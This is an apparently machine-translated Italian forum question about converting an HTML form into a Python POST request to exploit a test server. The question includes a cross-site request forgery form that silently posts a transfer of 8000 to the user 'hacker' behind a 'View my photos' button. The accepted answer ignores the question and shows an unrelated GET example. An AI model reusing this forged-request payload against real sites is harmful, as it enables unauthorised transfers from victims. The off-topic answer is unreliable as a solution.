Come posso tradurre questo codice html richiesta POST in python

0

Domanda

Sto avendo difficoltà a tradurre questo specifico HTML richiesta POST in Python - sto tentando di sfruttare una vulnerabilità di sicurezza di un server di prova.

director=
<form action="http://127.0.0.1:8000/card/0" method="POST">
  <input type="hidden" name="amount" value="8000" />
  <input type="hidden" name="username" value="hacker" />
  <input type="submit" value="View my photos" />
</form>

html python
2021-11-24 05:58:06
1

Migliore risposta

1

Prima di eseguire il codice riportato di seguito. Eseguire pip install richieste.

import requests

response = requests.get("http://api.open-notify.org/astros.json")
print(response)

>>>> Response<200>

Per maggiori informazioni, consultare il seguente URL.

https://www.nylas.com/blog/use-python-requests-module-rest-apis/

2021-11-24 06:22:35

In altre lingue

Questa pagina è in altre lingue

Русский
..................................................................................................................
Polski
..................................................................................................................
Română
..................................................................................................................
한국어
..................................................................................................................
हिन्दी
..................................................................................................................
Français
..................................................................................................................
Türk
..................................................................................................................
Česk
..................................................................................................................
Português
..................................................................................................................
ไทย
..................................................................................................................
中文
..................................................................................................................
Español
..................................................................................................................
Slovenský
..................................................................................................................